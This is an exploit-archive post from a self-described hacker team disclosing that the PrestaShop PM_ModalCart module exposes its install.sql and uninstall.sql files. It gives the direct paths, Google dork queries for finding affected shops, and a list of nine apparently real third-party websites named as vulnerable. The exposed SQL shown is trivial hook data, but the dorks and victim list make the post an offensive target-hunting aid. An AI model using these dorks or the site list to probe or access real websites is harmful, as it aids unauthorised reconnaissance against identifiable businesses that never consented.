facebook facebook twitter rss

PrestaShop PM_ModalCart 1.6.1.4 Database Disclosure

Author: KingSkrupellos , Published: 27-12-2018
#################################################################################################

# Exploit Title : PrestaShop PM_ModalCart 1.6.1.4 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 24/12/2018
# Vendor Homepage : prestashop.com
# Software Download Link : addons.prestashop.com/ru/pop-up/2438-modal-cart-3.html
+ prestashop.com/forums/topic/102385-module-pm-cross-selling-on-cart-est-maintenant-compatible-avec-modalcart/
# Software Price : 40$
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.5.0.14 - 1.4.5.1 - 1.4.7.0 - 1.4.7.3 - 1.4.8.2 - 1.6.1.4±
# Exploit Risk : Medium
# Google Dorks : inurl:''/modules/pm_modalcart/''
intext:''©2018 Recettes & Cabas | Tous droits réservés''
intext:''Agence de communication - Une réalisation Communikey''
intext:''cron module by samdha.net''
intext:''© 2018 - Udviklet og Hosted af Netgiganten.dk''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]

#################################################################################################

# Exploit :

/modules/pm_modalcart/install.sql

/modules/pm_modalcart/uninstall.sql

#################################################################################################

# Example SQL Database Information Exposure =>

install.sql =>

INSERT INTO `PREFIX_hook` (`name`, `title`, `description`, `position`) VALUES ('MCAbove',
'Modalcart above', 'On modal, above the product added to cart', 1);
INSERT INTO `PREFIX_hook` (`name`, `title`, `description`, `position`) VALUES ('MCBelow',
'Modalcart below', 'On modal, below the product added to cart', 1);

uninstall.sql

DELETE FROM `PREFIX_hook` WHERE `name` = 'MCAbove';
DELETE FROM `PREFIX_hook` WHERE `name` = 'MCBelow';

#################################################################################################

# Example Vulnerable Sites =>

[+] recettesetcabas.com/modules/pm_modalcart/install.sql

[+] boutique-solidaire.com/modules/pm_modalcart/install.sql

[+] voeux-solidaires.com/modules/pm_modalcart/uninstall.sql

[+] kakicrazy.fr/modules/pm_modalcart/install.sql

[+] visuashop.fr/modules/pm_modalcart/install.sql

[+] sac-promo-pas-cher.com/modules/pm_modalcart/install.sql

[+] km-justering.dk/modules/pm_modalcart/install.sql

[+] securedirect.dk/modules/pm_modalcart/install.sql

[+] griffin.ch/modules/pm_modalcart/uninstall.sql

#################################################################################################

# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team

Like us on Facebook :